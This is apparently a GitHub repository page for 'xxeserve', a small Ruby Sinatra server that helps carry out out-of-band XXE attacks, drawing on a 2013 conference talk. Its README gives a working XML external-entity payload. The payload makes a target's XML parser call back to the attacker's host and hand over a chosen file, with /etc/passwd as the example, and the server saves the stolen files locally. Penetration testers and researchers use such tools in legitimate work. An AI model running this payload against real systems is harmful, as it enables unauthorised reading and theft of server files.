Skip to content

joernchen/xxeserve

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
files
files
 
 
.gitignore
.gitignore
 
 
Gemfile
Gemfile
 
 
README.md
README.md
 
 
xxeserve.rb
xxeserve.rb
 
 

Repository files navigation

XXE Out of Band Server.

This tiny Sinatra app will assist you in using the XXE Out of Band technique described in [0].

Usage:

Start on default port of 443 (may need sudo on some systems)

ruby xxeserve.rb

Pass in port to start on

ruby xxeserve.rb 8080

Trigger the XML parser with the following XML:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://YOURHOST:YOURPORT/xml?f=FULLPATH">
%remote;
%int;
%trick;]>

Where YOURHOST and YOURPORT needs to be set to the host/port this app runs on in the URL you provide. FULLPATH needs to be set to the full absolute path of the to be read file (e.g. f=/etc/passwd)

e.g. http://8.8.8.8:443/xml?f=/etc/passwd

The according file will be send to the app and stored under ./files

Depending on the targeted parser it may not work with all files.

[0] http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf

About

XXE Out of Band Server.

Resources

Readme
Activity

Stars

166 stars

Watchers

7 watching

Forks

38 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages